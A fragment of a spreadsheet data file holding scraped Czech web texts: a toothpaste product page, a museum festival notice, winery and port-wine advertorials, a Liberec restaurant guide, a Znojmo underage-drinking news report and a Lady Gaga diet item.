daleko. Máma Judita chce restartovat svůj život a vyoutovaný otec Michal se ocitne bez práce. K nastoleným konfliktům a problémům z první řady navíc přibydou nové. A snad si u toho opět užijeme i hodně srandy. Sex O'Clock: trailer na 2. sérii | Voyo Těžký rok 58 % Francouzská komedie od tvůrců oblíbených Nedotknutelných vypráví o dvojici břídilů, jejichž život se rozpadá pod rukama a dluží, kam se podívají. Kvůli chipsům a pivům zdarma se přidají ke skupině mladých aktivistů, kteří chtějí změnit svět. Při účasti na jejich akcích ovšem hledají způsoby, jak si finančně přilepšit. Podvodníček Albert se však zakouká do vůdkyně skupiny Cactus . Komedie je nově dostupná na platformě Max. Těžký rok: trailer | Aerofilms Zdroje: Netflix , Disney+, SkyShowtime, Max Související osoby Autor: Milan Rozšafný Autor person Milan Rozšafný</t>
  </si>
  <si>
    <t>57290</t>
  </si>
  <si>
    <t>20241101_8_3265259971_4981229c1ec5d119fef4.html</t>
  </si>
  <si>
    <t>4981229c1ec5d119fef4</t>
  </si>
  <si>
    <t>Biomed Charcoal zubní pasta 100 g</t>
  </si>
  <si>
    <t>Biomed Charcoal zubní pasta 100 g Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Biomed a nejlevnější získáte zdarma! Nabídka končí za Z 98 % přírodní bělící zubní pasta s BIO certifikací a černým uhlím pro trojité bělení a ochranu dásní. Příjemná sladce mátová příchuť. 100g. Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Biomed a nejlevnější získáte zdarma! Nabídka končí za Cena za 100 g: 119,00 Kč Můžete mít zítra více info Skladem 5+ks V Pilulka Boxu již zítra od 20:00 Pilulka Expresem již v pondělí 11. 11. od 13:00 Dostupné na Markéta S. doporučuje Varianta Biomed Citrus fresh zubní pasta 100 g Užijte si čištění chrupu díky zubní pastě s esenciálními oleji z grepu, citrónu, mandarinky a máty. Nejen, že důkladně vyčistí zuby, ale také díky vůni dodá vašemu tělu pocit uvolněnosti a klidu. 99 % jejího složení je přírodní, takže nemusíte mít výčitky ani vůči životnímu prostředí. Příchuť pasty Skvělá přírodní pasta s černým uhlím Erika Č. doporučuje Varianta Biomed Charcoal zubní pasta 100 g Pasta BIOMED Charcoal dokonale splňuje parametr "za málo peněz, hodně muziky". Její složení je z více než 98% přírodní. Krásně bělí díky obsahu černého uhlí. Tento fakt ocení většina, hlavně milovníci kávy (jako já), případně vína aj. Pozitivně působí také na zubní sklovinu, obsahuje totiž hydroxyapatit vápenatý, který je známý jako tzv. tekutá zubní sklovina. Pasta je navíc celkově šetrná k zubní sklovině, neobsahuje fluoridy. Při čistění zubů mě nejvíc zaujala její chuť, která je příjemná a svěží. Použití je široké, můžeme bělit zuby celé rodince. Přírodní Ne tak výrazný bělící účinek Užitečné ( 1 ) Neužitečné ( 1 ) Komplexní přírodní zubní pasta pro účinné bělení a ochranu dásní Zubní pasta BIOMED CHARCOAL je určena pro dospělé a děti od 6 let a obsahuje 98 % složek přírodního původu. Obsahuje tři typy uhlí (bambusové, aktivní a dřevěné), které v kombinaci s enzymem bromelain z ananasového extraktu jemně čistí zuby od zabarveného plaku. Přírodní antiseptika ve formě výtažků z jitrocele a březových listů mají pozitivní vliv na stav dásní a zklidňují je. Posiluje a obnovuje zubní sklovinu Odstraňuje zubní kámen a jemně bělí zuby o 1 odstín po 4 týdnech používání Poskytuje svěží dech a podporuje zdraví dásní Silná sklovina a svěží dech Přídavek hydroxyapatitu vápenatého a L-argininu posiluje a obnovuje zubní sklovinu a citrát zinečnatý a kafrový olej působí protizánětlivě a chrání před bakteriemi. Esenciální oleje z cedrového dřeva, citronové trávy a máty zajišťují svěžest dechu. BIOMED CHARCOAL odstraňuje zubní kámen a bělí zuby o jeden odstín již po 4 týdnech používání. Nejlepší výsledky přináší v kombinaci s kartáčkem BIOMED BLACK s uhlíkovými vlákny. Účinnost produktu potvrzují četné klinické studie. Dřevěné uhlí se v ústní hygieně používalo již ve starověkém Řecku a to především díky jeho schopnosti absorbovat nečistoty z povrchu skloviny. Použití Pro dosažení optimálních výsledků doporučujeme čistit zuby po dobu 2 minut 2× denně po jídle. Čisticí účinky klinicky ověřeny. Vhodné pro celou rodinu včetně dětí od 6 let. Složení Aqua, Hydrogenated Starch Hydrolysate, Dicalcium Phosphate Dihydrate, Hydrated Silica, Glycerin, Sodium Coco-Sulfate, Cellulose Gum, Aroma, Calcium Hydroxyapatite, Zinc Citrate, Tetrasodium Glutamate Diacetate, Benzyl Alcohol, Sodium Bicarbonate, Xanthan Gum, Menthyl Lactate, Xylitol, Carbon Black , Charcoal Powder, Cymbopogon Flexuosus Herb Oil, Mentha Piperita Oil, Ananas Sativus Fruit Extract, Maltodextrin, Cinnamomum Camphora Bark Oil, Cedrus Atlantica Bark Oil, Betula Alba Leaf Extract, Plantago Major Leaf Extract, Arginine, Sodium Benzoate, Potassium Sorbate, Limonene, Citral. Neobsahuje: Fluorid SLES, PEG Sacharin Syntetická aromata a barviva Přísady živočišného původu a je tedy vhodný i pro vegany SPLAT – Specialista na péči o ústní dutinu BIOMED od společnosti SPLAT je kombinací více než 20 ingrediencí přírodního původu a poskytuje celé vaší rodině komplexní a efektivní péči o zuby a ústa ve špičkové kvalitě za rozumnou cenu. Účinky klinicky ověřeny. Poskytuje perfektní ochranu před zubním kazem i bez fluoridu. BIOMED je až z 99 % přírodní, nyní s plně recyklovatelným kartonovým obalem. Ocení ho tak i zastánci zdravého životního stylu a života v souladu s přírodou a také ti, jimž není hostejná budoucnost naší planety. Vhodné pro vegany. Složení Aqua, Hydrated Silica, Hydrogenated Starch Hydrolysate, Dicalcium Phosphate Dihydrate, Glycerin, Sodium Coco-Sulfate, Aroma, Cellulose Gum, Zinc Citrate, Benzyl Alcohol, Calcium / Magnesium / Zinc Hydroxyapatite, Mentha Piperita Oil, Tetrasodium Glutamate Diacetate, Arginine, Stevia Rebaudiana Leaf Extract, Citrus Limon Peel Oil, Vitis Vinifera Seed Extract, Thymus Serpillum Oil, Betula Alba Leaf Extract, Plantago Major Leaf Extract, Ananas Sativus Fruit Extract, Maltodextrin, Sodium Bicarbonate, Boswellia Serrata Oil, Helianthus Annuus Seed Oil, Sodium Hydroxide, Quercus Robur Bark Extract, Sodium Benzoate, Potassium Sorbate, CI 14720, Citric Acid, Sodium Chloride, Limonene, Eugenol, Linalool, Citronellol, Geraniol. Zkuste také ostatní produkty značky Biomed, které uvidíte v kategoriích Dětská kosmetika a drogerie, Zubní pasty a Matka a dítě. Výrobek ohodnotilo 135 zákazníků a 99 % z nich ho doporučuje. Pokud si nejste jistí volbou tohoto produktu, zkuste se ještě podívat do kategorie Zubní pasty bez fluoru pro děti.</t>
  </si>
  <si>
    <t>20241101_80_3264347588_ac185abf025481b7860c.html</t>
  </si>
  <si>
    <t>ac185abf025481b7860c</t>
  </si>
  <si>
    <t>Día de Muertos v Náprstkově muzeu na Betlémském náměstí Oblíbený mexický festival Día de Muertos (Den mrtvých) se po roce vrací do Náprstkova muzea asijských, afrických a amerických kultur Národního muzea . V sobotu 2. a v neděli 3. listopadu zaplní nádvoří Náprstkova muzea oslavy jednoho z nejdůležitějších svátků, které jsou zapsány na seznamu nehmotného kulturního dědictví UNESCO. Día de Muertos Festival, organizovaný ve spolupráci s mexickým kolektivem Día de Muertos a dalšími partnery, přináší do Prahy jedinečnou atmosféru, během které mají návštěvníci příležitost ponořit se do bohaté mexické kultury a tradic. Día de Muertos čili Den mrtvých je v Mexiku jedním z nejdůležitějších svátků doprovázený bujarými oslavami, který vzdává hold předkům a jejich duším. Letošní ročník nabídne pestrý program, který oslavuje hluboké kořeny mexické komunity, a zároveň posiluje kulturní vazby mezi Mexikem a Českou republikou . Program: Tradiční oltáře (Ofrendas): bohatě zdobené oltáře na počest zesnulých Dílny a rodinné aktivity: zdobení masek, Wixarika korálkové umění, tvoření papel picado a malování na obličej Živá vystoupení: Mariachi hudba, tradiční tance od Mestizo Ballet z Londýna , regionální mexická hudba od Tonalli z Vídně a další Soutěž o nejlepší Catrinu: přijďte oblečeni jako Catrina a soutěžte o výhru Piñatu pro děti: neděle plná zábavy s piñatami pro nejmenší návštěvníky Mexické řemeslníky: ručně vyráběné zboží a tradiční výrobky Fantaskní průvod masek První den festivalu zakončí veselý fantaskní průvod masek, který se vydá z Betlémského náměstí centrem Prahy až na Staroměstské náměstí , a oslaví život, smrt a ducha komunity. Na akci je vstup zdarma. Program probíhá po celý víkend od 10.00 do 21.30 hodin. Více informací a program naleznete ZDE Zdroj: Národní muzeum Související Autor: Jana Bečková Autor person Jana Bečková</t>
  </si>
  <si>
    <t>20241101_81_3265071513_bdaa4d32df6826b36513.html</t>
  </si>
  <si>
    <t>bdaa4d32df6826b36513</t>
  </si>
  <si>
    <t>Vychutnejte si vína, která vyprávějí příběh znojemského kraje, tradice a osobitého přístupu.</t>
  </si>
  <si>
    <t>Shrnutí Vychutnejte si vína , která vyprávějí příběh znojemského kraje, tradice a osobitého přístupu. +420 602 149 445 Znojemské vinařství, které garantuje mimořádnou kvalitu a skvělou chuť v každé láhvi vína V srdci malebného Znojemska, ve vinařské obci Hodonice, najdete vinařství, které přináší nezapomenutelné zážitky a mimořádná vína . VINAŘSTVÍ VINO HORT, založené v roce 1999, spojuje moravskou tradici s moderními technologiemi a vášní svého zakladatele Jiřího Horta, který si získal renomé jako mistr růžových vín. V tomto vinařství však čeká mnohem víc – od originálních bílých VOC vín až po výběrová červená z francouzských hroznů. Přijďte objevit svět VINO HORT a přesvědčte se, proč je to vinařství jedním z nejznámějších na Moravě . Znojemské vinařství VINO HORT – Svět špičkových vín a jedinečných zážitků Vinař Jiří Hort Navštivte VINAŘSTVÍ VINO HORT v Hodonicích a vydejte se na cestu, kde víno není jen nápojem, ale i zážitkem. Víno klub - VINO HORT Více Méně fotografií Jak chutná Znojmo ve skleničce? VOC vína jako záruka kvality Co je tajemstvím nezaměnitelné chuti znojemských vín? Odpovědí je VOC Znojmo – první apelační systém v České republice , který zaručuje původ a kvalitu vína . VINO HORT patří mezi zakládající členy tohoto systému a jeho vína jsou přímo esencí Znojemska. Vína od Jiřího Horta, jako jsou Veltlínské zelené, Sauvignon a Ryzlink rýnský, odrážejí nejen terroir, ale také vášeň a umění vinaře. Díky skleněným Vinolok uzávěrům zůstává svěžest a aroma těchto vín neporušené – jsou ovocnější, svěžejší a méně zatěžují organismus. Přijďte ochutnat autentickou chuť Znojemska a nechte se unést! Co dělá růžové víno VINO HORT tak výjimečným? Jiří Hort, považovaný za průkopníka růžových vín na Moravě , vytvořil řadu Rosé HORT, která si získala srdce milovníků vína po celé zemi. Hortův Merlot Rosé 2020 se dokonce stal nejprodávanějším moravským vínem ve Víno-klubu. Tento osvěžující letní nápoj s jemnými tóny ovoce přináší radost do každé skleničky. Pokud jste dosud růžovým vínům neholdovali, vězte, že Rosé HORT je zážitek, který stojí za vyzkoušení. Dopřejte si růžové víno , které vás přenese do sluncem zalitého léta při každém doušku. Víte, že si Jiří Hort vybírá hrozny ve Francii ? Od tradičních moravských vinařství se liší tím, že nevlastní vlastní vinice, ale pečlivě vybírá hrozny z nejlepších regionů. Pro červená vína přiváží ty nejkvalitnější hrozny z jižní Francie , konkrétně z Languedocu, kde spolupracuje s tamními vinaři. Tato vína z řady HORT France v sobě spojují charakter francouzských vinic a řemeslnou preciznost Jiřího Horta. Hledáte víno , které je nejen lahodné, ale má také příběh? HORT France vám toto spojení nabídne v každé láhvi. Objevte francouzský šarm v moravském podání – HORT France vás okouzlí. Co znamená pojem exkluzivní klubová vína ? Jiří Hort každoročně vytváří pro Víno-klub exkluzivní cuvée – umělecké spojení odrůd, jejichž výsledná chuť se stává nezapomenutelným zážitkem. Míchání vína , zvané kupáž, je umění, ve kterém se Jiří Hort stal mistrem. Jeho poslední cuvée, kombinace Syrahu, Grenache a Marselanu, slibuje nezapomenutelný zážitek pro každého, kdo miluje plná, harmonická červená vína . Zkuste exkluzivní klubová vína a poznejte, co znamená umění kupáže v té nejčistší podobě. Může být víno zdravější? V každé láhvi najdete víno , které vzniklo s ohledem na přírodu i na pohodu každého milovníka vína . Díky skleněným uzávěrům Vinolok, pocházejícím z Jablonce nad Nisou , jsou vína dlouhodobě svěží a zachovávají si své autentické aroma i chuť. Tento uzávěr umožňuje víno chránit přirozenějším způsobem, a proto si vína VINO HORT vystačí s nižším obsahem síry, cukru i kyselin. Výsledkem jsou jemnější vína , která chutnají skvěle a současně méně zatěžují náš organismus. Zažijte víno , které je šetrné, svěží a naprosto jedinečné. FIREMNÍ ČLÁNKY</t>
  </si>
  <si>
    <t>8290</t>
  </si>
  <si>
    <t>7230</t>
  </si>
  <si>
    <t>20241101_82_3264815070_59e68bb866f7a10ba978.html</t>
  </si>
  <si>
    <t>59e68bb866f7a10ba978</t>
  </si>
  <si>
    <t>Kam na jídlo - Region Liberec</t>
  </si>
  <si>
    <t>Kam na jídlo - Region Liberec Přidržením klávesy ctrl budete moci přiblížit a oddálit mapu kolečkem myši. Pro ovládání mapy použijte dva prsty. Zpět Úvodní strana Kam na jídlo Jaká je nejčastější otázka při výletech? Kde se dobře najíst! Tak těchto možností máme v Libereckém kraji opravdu spousty. Ať už vyhledáváte českou klasiku nebo mezinárodní kuchyni, restaurace vedené michellinskými kuchaři, stylová bistra či útulné kavárny, čeká na vás spousta možností, kde obohatíte své chuťové buňky nebo třeba jenom strávíte hezkou chvilku se svými přáteli. Mezi oblíbená nejen snídaňová centra patří kavárna a bistro Mikyna, které připravuje každý týden jiné menu, v Bistro Široká si dejte Croque Madam a na výběrovou kávu z pražírny Nordbeans zamiřte do jejich vlastní kavárny DOK, která je perlou liberecké gastronomie a architektury. Nachází se v historickém objektu u vlakového nádraží, což dodává místu nezaměnitelnou atmosféru. Právě za rekonstrukci dostali architekti prestižní cenu Karla Hubáčka . Ale zpět k jídlu – základem poctivé gastronomie je poctivý chleba, proto si ho tu i sami pečou. Milovníci květin by neměli vynechat kavárnu Kytka, cestu do Řecka podniknete v restauraci MASA BUKA. Zcela ikonická je určitě i večeře na Ještědu v místní restauraci, kde navíc kromě skvělého jídla dostanete i báječný výhled nejen na město Liberec , ale i na celý region. Ale ani mimo město Liberec se nemusíte nechat ošidit při vašich výletech. Ať už v Jizerských horách , Lužických horách , Krkonoších , Českém ráji nebo Máchově kraji i zde se nabízí celá řada vyhlášených restaurací, které stojí za návštěvu. Pojďme si je spolu projít. V Jizerských horách byste jistě neměli vynechat návštěvu restauraci Královka. Královská restaurace = královská gastronomie. To je motto, na kterém si zakládá zdejší šéfkuchař Patrik Bečvář, který stojí i v čele Národního týmu kuchařů a cukrářů. Tradiční českou kuchyni nabídne nedaleko stojící Prezidentská chata. Tak schválně, kdy jste naposledy měli brambory na loupačku s tvarohem? Tady je mít můžete a stojí to za to. Vyznavači lahodného moku určitě nepohrdnou návštěvou pivovaru Volt v Jablonci nad Nisou a skvělou volbou bude i znovu obnovená restaurace Petřín , která nabízí kromě chutného jídla i výhled na město Jablonec nad Nisou V Máchově kraji byste rozhodně neměli minout zařízení S láskou Karel, které najdete pod hradem Bezděz . Zdejší burgery patří mezi vyhlášené a vyplatí se na ně počkat. Stejně skvělou kuchyni nabízí Restaurace Pod Habstejnem u Jestřebí nebo například Turnovská pivnice na břehu Máchova jezera . S výběrem vám pomůže Gastromapa K.H. Máchy, který by byl na svůj region právem pyšný. A co Český ráj? Za nás určitě doporučujeme návštěvu Abelova mlýna v Dolánkách u Turnova , kafe bychom si dali v K afe kytka nebo v Panorama v Turnově , zmrzlinu nesmíte minout v ToGelato a asijskou kuchyni ovládají v PUKU Bistro. Pokud vyrazíte jen kousek za hranice Libereckého kraje, ale stále do Českého ráje tak si určitě nenechejte ujít gastro zážitek Na Krásné Vyhlídce na Příhrazských skalách. Kulinářský zážitek z masa z vlastního chovu si pro vás nachystali v Jítravě v Lužických horách , špičkovou kuchyni s uklidňujícím cinkáním ovčích zvonců najdete na Farmě Hvozd, moderní kuchařinu v pivovarském hávu nabízí restaurace pivovaru Cvikov a nakukovat sklářům pod ruku při jídle lze ve Sklářské krčmě v Lindavě . To je nabídka Lužických hor , která by vám neměla uniknout. A co Krkonoše ? Za nás jednoznačně restaurace U Čápa v Příchovicích, kde si vaří i vlastní pivo Světoběžník, naprosto dokonalá nejen česká kuchyně se servíruje na Kněžické chalupě a na domácí housku a krkonošské kyselo vyšlápněte na Dvoračky. Nabídka gastro zážitků je opravdu nepřeberná a stačí si vybrat jen podle své vlastní chuti. Název ↑ ↓ X Datum vložení ↑ ↓ X 50.79482956;15.16348252;2544;Prezidentská chata;1|50.71181639;15.17058361;4658; Petřín - hotel s restaurací a vyhlídkovou věží;2|50.79236611;14.85532389;11414;Restaurace – Jítravský Dvorec;14|50.60322500;15.16934306;11553;Restaurace a penzion Ábelův mlýn;1|50.73640083;14.63791778;11577;AJETO - sklářská krčma;14|50.73269167;14.98446972;12339;Restaurace - Hotel Ještěd;14|50.58812487;15.15637051;14141;Panorama Café;18|50.77198473;15.16902498;16034; Hotel Královka ;2|50.77032905;15.06031369;23643;MASA BUKA Nikosova řecká taverna;14|50.76940694;15.05686694;23758;Kafe Kytka;18|50.76810306;15.05449694;23959;Bistro Široká;14|50.77170306;15.06334389;24005;Mikyna;14|50.73183311;15.16990418;27708;Pivovar Volt;109|50.73979829;15.34638807;27905;Restaurace U Čápa;14|50.82806943;14.70151002;30602;Farma Hvozd;1 Lužické hory Autor: as4u.cz, s.r.o.</t>
  </si>
  <si>
    <t>678000</t>
  </si>
  <si>
    <t>20241101_83_3264833974_e9cd23585ef7e27ead15.html</t>
  </si>
  <si>
    <t>e9cd23585ef7e27ead15</t>
  </si>
  <si>
    <t>Firemní akce v Mikulově, vína a stylové prostory pro všechny akce</t>
  </si>
  <si>
    <t>Firemní akce v Mikulově , vína a stylové prostory pro všechny akce +420 730 597 700 Firemní akce v Mikulově , prvotřídní vína a stylové prostory pro vaše akce Pokud hledáte originální a nezapomenutelné místo pro vaši firemní akci nechte se zlákat kouzlem Mikulova a vinařstvím Víno Šimák. Toto rodinné vinařství s tradicí od roku 1930 vám poskytne nejen prvotřídní přívlastková vína z vlastních vinic, ale také stylové prostory pro vaše setkání, pohoštění, ubytování a zábavu. Firemní akce s vínem a zábavou Firemní akce s kompletním servisem Mikulov , ideální místo pro vaši firemní akci plnou historie, vína a zábavy Vinařství Víno Šimák se nachází v centru Mikulova , malebného města na jižní Moravě , které je proslulé svou historií, památkami a vinařskou kulturou. Zde můžete prožít nezapomenutelnou firemní akci. Užijete si nejen odborné a pracovní chvíle, ale také relaxaci a zábavu v krásném prostředí chráněné krajinné oblasti Pálava. Firemní akce v Mikulově Firemní akce s kompletním servisem ve stylových prostorech v Mikulově Kompletní servis pro vaši firemní akci v Mikulově vám zajistí vinařství Víno Šimák. Jejich vinný sklep či restaurace s vinárnou jsou ideálním místem pro vaši firemní akci, která vám a vašim kolegům přinese nejen užitečné informace, zkušenosti a dovednosti, ale také spoustu zábavy, odpočinku a nezapomenutelných zážitků. Nabízí také možnost zajistit ubytování v Mikulově či okolí. Perfektní prostory pro vaše firemní akce v Mikulově Firemní akce s vínem v Mikulově , spojte práci s relaxací a degustací vynikajících vín Užijte si nezapomenutelnou firemní akci díky vinařství Víno Šimák. Prožijte jedinečnou firemní akci spojenou s vínem . Můžete si zde vychutnat vína jakou jako jsou Chardonnay, Neuburské, Veltlínské zelené, Cabernet Sauvignon, Svatovavřinecké, Zweigeltrebe, Pálava, Sauvignon nebo Ryzlink vlašský. Neváhejte a rezervuje si svou firemní akci v Mikulově ještě dnes. Firemní akce s vínem a zábavou FIREMNÍ ČLÁNKY</t>
  </si>
  <si>
    <t>20241101_84_3264503348_da1d94ce9ebe1d8f1a23.html</t>
  </si>
  <si>
    <t>da1d94ce9ebe1d8f1a23</t>
  </si>
  <si>
    <t>Zátah policistů a strážníků v ulicích Znojma. Popíjení venku a děti pod vlivem</t>
  </si>
  <si>
    <t>Zátah policistů a strážníků v ulicích Znojma . Popíjení venku a děti pod vlivem ČETLI JSTE? Bezpečí pod lávkou ve Znojmě hlídá nově kamera. Ve městě přibudou další Výsledkem bylo dvanáct mladých lidí, kterým ještě nebylo osmnáct a byli pod vlivem alkoholu . „Konkrétně strážnici při akci řešili pět mladistvých dívek, které popíjely alkohl. Některé z nich měly bezmála jedno promile. Hlídky předaly do péče rodičů," dodala Smutná s tím, že případy dostanou k dořešení úředníci. close info Zdroj: Unsplash zoom_in Bezmála sto třicet lidí zkontrolovali minulý pátek policisté a strážníci ve Znojmě . Ilustrační snímek. Strážníci také zaznamenali tři případy porušení vyhlášky města, která zakazuje popíjení na veřejných prostranstvích. Za prohřešky padly pokuty ve výši pět set, tisíc a pět tisíc korun. V ulicích byly čtyři desítky policistů a strážníků. „Ti pak společně zkontrolovali sto osmadvacet lidí. Všem, kteří se na akci podíleli, patří poděkování," vzkázal starosta Znojma František Koudela . play_fill Nehody Kontrola se uskutečnila v pátek 25. října, před prodlouženým víkendem a následnými podzimními prázdninami. Opilé děti ale nejsou žádnou výjimkou. V polovině října se potulovali po desáté hodině večer tři mladíci po Kuchařovické ulici. Byli posilnění alkoholem , strážníci naměřili 1,65 a přes dvě promile alkoholu . Dvěma chlapcům bylo pouhých patnáct let. Alarmující věk Dvanáct let je průměrný věk, kdy se děti dostanou poprvé k alkoholu . Obvykle to bývá v rodinách. I v dětství přitom může vzniknout závislost na alkoholu . „Současně platí, že čím dříve mladý člověk začne pít často alkohol , tím je vyšší rychlost nástupu případné závislosti. Riziko ohrožení alkoholismem se dále také zvyšuje u těch mladých mužů, jejichž otec je závislý na alkoholu . Společnost děti a mladistvé před alkoholem chrání zákonem," sdělili odborníci na Národním zdravotnickém informačním portálu. close info Zdroj: se svolením PČR zoom_in Dechová zkouška na alkohol . Ilustrační snímek. Věková hranice pro podávání alkoholu u nás je osmnáct let, ale například v USA a Japonsku jednadvacet let. Prodej a podávání alkoholu mladým, kterým ještě nebylo osmnáct let, zákon striktně zakazuje. Lidé, kteří alkohol mladistvým nebo dětem zprostředkují, se dopouštějí přestupku nebo trestného činu. Tresty pro podniky Ředitel Asociace poskytovatelů adiktologických služeb Matěj Hollan míní, že případné pouty jsou jen malým bičem na ty, kteří mladým nalévejí. „Pokuty na majitele podniků nemají prakticky žádný dopad. Přitom prodej alkoholu nezletilým je v České republice opravdu velký problém. Já bych se nebál jít cestou některých zahraničních států, kde se při porušení tohoto zákona na pár dní provozovna prostě zavře. Tedy takové varování. A pokud se prohřešek opakuje, odebere se licence,“ míní Hollan. Podrobně se tématu Deník věnoval ZDE. V celé zemi vede konopí Alkohol podle statistik ztrácí mezi mladšími generacemi postupně na popularitě, i když míra jeho konzumace zůstává ve srovnání s ostatními evropskými zeměmi vysoká. Češi v číslech Nejvíce alkoholu v Česku vypijí lidé mezi 45 a 64 lety, se základním vzděláním nebo vyučení, a také muži. Zatímco pětina Čechů si alkohol dopřává jednou až dvakrát týdně, asi sedm procent ho pije každý nebo téměř každý den. Nejoblíbenější nelegální látkou jak v Česku, tak v Evropě , je konopí. Za poslední rok ho vyzkoušela necelá čtvrtina mladých. Autor: Ilona Pergrová Autor Ilona Pergrová</t>
  </si>
  <si>
    <t>20241101_85_3265227548_0732954046d38ec9127d.html</t>
  </si>
  <si>
    <t>0732954046d38ec9127d</t>
  </si>
  <si>
    <t>Lady Gaga a její opilá dieta: Cvičením z těla vyhání alkohol a shazuje přebytečná kila</t>
  </si>
  <si>
    <t>Lady Gaga a její opilá dieta: Cvičením z těla vyhání alkohol a shazuje přebytečná kila 1. 11. 2024 Šárka Cvrkalová Celebrity, Hubnutí, Nápoje a alkohol , Zajímavosti Komentáře nejsou povolené u textu s názvem Lady Gaga a její opilá dieta: Cvičením z těla vyhání alkohol a shazuje přebytečná kila Lady Gaga rozhodně patří k celebritám, které umí překvapit. V minulosti se ukázala na jevišti v mnoha nečekaných modelech a je jasné, že sebevědomí ji nechybí. Postavu má ale skvělou, to se jí musí nechat. Jak se udržuje v kondici? Nikdy prý nedodržovala žádnou speciální dietu, ani se nijak neomezovala v jídle. Naopak si velmi ráda dopřává i sladké. Čemu ale neodolá, je podle jejích slov kvalitní alkohol . Proto svůj životní styl zpěvačka nazývá opilou dietou. Výrazná změna postavy Lady Gaga obvykle předvádí na jevišti dokonalou figuru. Bylo nicméně období, kdy trochu přibrala a fanoušci si toho začali všímat. Ona sama se potom rozhodla na sobě zapracovat a během několika měsíců kila shodila. Už před nějakým časem se proto média výrazně zajímala o to, jak se jí podařilo dostat se zpět na původní váhu za tak krátkou dobu. A Gaga s úsměvem odpověděla, že pomocí alkoholu . Co vypije, to zase vycvičí Dobrému pití zpěvačka jednoduše neodolá. Aby se ale udržovala v kondici, pravidelně pak cvičí, což podle jejích slov pomáhá s kocovinou. A odborníci souhlasí, podle nich skutečně může cvičení ve zdravé míře snížit opilost, vysvětluje Independent. Během své opilecké diety prý Lady Gaga nejraději popíjí whiskey, a to často i v pracovní době. Nikdy se ale neopije tak, aby si udělala ostudu. Jakmile cítí, že na ni alkohol působí, jde si zacvičit a dostane tak ze sebe opilost, ale i nadbytečná kila. Tom Holland : Filmový Spider-man cvičí a jí zdravě. Někdy si ale dá rád i pizzu Problém hudebnici prý dělá dodržování zdravého spánku a dostatečného pitného režimu. I tyto dvě věci nicméně prý nahrazuje cvičením a cítí se díky tomu neustále plná energie a ve skvělé kondici. Zdroj: Reuters, Entertainment Weekly , NDTV, Independent, Glamour, Hindustan Times Autor: Šárka Cvrkalová Autor: Svět Úžasný, Šárka Cvrkalová Autoři person Svět Úžasný person Šárka Cvrkalová Rubrika transition_slide Celebrity</t>
  </si>
  <si>
    <t>2710</t>
  </si>
  <si>
    <t>20241101_86_3264625322_feb25c049e8e4d90039f.html</t>
  </si>
  <si>
    <t>feb25c049e8e4d90039f</t>
  </si>
  <si>
    <t>Portské Grahamʼs je jako stvořené pro chladné zimní večery Zima se pomalu blíží, a jak jinak si ji zpříjemnit než portským vínem , které vás krásně zahřeje v chladném období roku. Ať už toužíte po skvělém aperitivu, digestivu či svěžím drinku, portské víno značky Grahamʼs splní každé vaše přání. Tento portugalský skvost najde své právoplatné místo v každé domácnosti a skvěle se hodí ke každé příležitosti – třeba i ke štědrovečerní večeři. Užijte si chladné zimní večery s portským vínem Graham’s, skvostem od rodinné firmy Symington. Její tradice obchodování s vínem sahá až do 17. století a letité zkušenosti se odrážejí nejen v šetrném a pečlivém výrobním procesu, ale i v hospodaření na vlastních unikátních vinicích v Portugalsku . Prvotřídní portské Graham’s si vychutnáte jako aperitiv nebo digestiv. Rodinná společnost Symington také klade důraz na udržitelnost a získala ocenění B Corp . Ať už si vyberete jakkoli, Graham’s vám bude tím pravým společníkem. Graham’s Port Wine Fine Tawny pořídíte na www.1er.cz za 315 Kč Graham’s Port Wine Fine Tawny je červené portské víno s plnou chutí. Vyznačuje se silnou vůní a výrazným charakterem, který je středně složitý, s příjemnou dochutí a aromatem. Jeho okouzlující tmavá barva doplňuje sladší chuť, jež má méně ovocné tóny. Toto portské víno je ideální pro slavnostní příležitosti nebo setkání s přáteli. Doporučuje se podávat při teplotě 18 stupňů, nejlépe v kombinaci s kvalitními sýry. Graham’s Port Wine Ruby Six Grapes Reserve zakoupíte na www.1er.cz v dárkové tubě za 520 Kč Graham’s Port Wine Ruby Six Grapes Reserve vyniká lahodnou kombinací vybraných hroznů z těch nejlepších vinic. Díky tomu mohlo vzniknout toto delikátní portské s oranžovohnědou až tmavočervenou barvou. Chuť je perfektně vyvážená a okouzlí i vybíravé milovníky vintage port. Nechce se unést bohatým aroma, ve kterém se snoubí zralé třešně a švestky, a vychutnejte si dlouhý závěr, jenž skvěle zakončuje vyváženou strukturu vína . Graham’s Port Wine Tawny 10 Years Old seženete na www.1er.cz v dárkové tubě za cenu 710 Kč. Graham’s Port Wine Tawny 10 Years Old je velmi oblíbené, komplexně vyvážené portské víno . Sladká chuť s bohatými ovocnými tóny vrcholí dlouhou dochutí. Díky desetiletému zrání a těm nejlepším pečlivě vybraným hroznům má víno dokonale vyváženou chuť. Je ideální volbou pro výjimečné příležitosti a výborně se hodí ke sladkým dezertům, jako je jablečný koláč se skořicí nebo mandlový dort. Graham’s Fine Ruby Port je k dostání na www.1er.cz za 315 Kč Graham’s Fine Ruby Port je portské s plným tělem a harmonickou svěžestí šťavnatého ovoce. Lahvuje se jako poměrně mladé víno , a díky tomu si uchovává svůj výrazný ovocný charakter. Jedná se o ideální portské pro každodenní konzumaci. Jeho hluboká rubínová barva skvěle doplňuje vůni zralého červeného ovoce, ostružin a borůvek. V chuti vás překvapí šťavnaté tóny tmavých až černých třešní s velmi intenzivním závěrem. Předchozí článek Autor: Marek Zelený Autor person Marek Zelený Rubrika transition_slide Domácí bar</t>
  </si>
  <si>
    <t>368</t>
  </si>
  <si>
    <t>754</t>
  </si>
  <si>
    <t>20241101_87_3264640164_011da7bf14600561478f.html</t>
  </si>
  <si>
    <t>011da7bf14600561478f</t>
  </si>
  <si>
    <t>Rus Bocharov: Moje máma bere důchod čtyři tisíce korun měsíčně!</t>
  </si>
  <si>
